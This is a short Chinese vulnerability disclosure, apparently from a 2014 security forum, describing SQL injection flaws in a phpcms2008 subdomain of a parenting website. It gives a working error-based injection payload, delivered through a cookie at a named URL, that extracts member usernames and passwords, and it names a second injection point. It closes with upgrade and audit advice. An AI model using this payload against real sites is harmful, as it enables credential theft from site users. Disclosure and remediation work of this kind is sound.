父母网某分站多处SQL注入漏洞下载

来源:黑吧安全网 浏览:1101次 时间:2014-04-28
做网站找雨过天晴工作室

漏洞站点:http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday:

注射点:http://taobao.fumu.com/comment/comment.php?action=vote



编辑cookie:field=content=0x7c where (select 1 from(select count(*),concat(0x7c,(select concat(username,0x7c,password) from phpcms8_member limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#



第二处漏洞站点:http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday:

注射点:

http://taobao.fumu.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2

修复方案:

phpcms2008官方已经停止维护了,还存在多个0day,建议厂商更新phpcms版本,如果一定要使用2008,可以先做一次代码审计修复一下代码多处缺陷。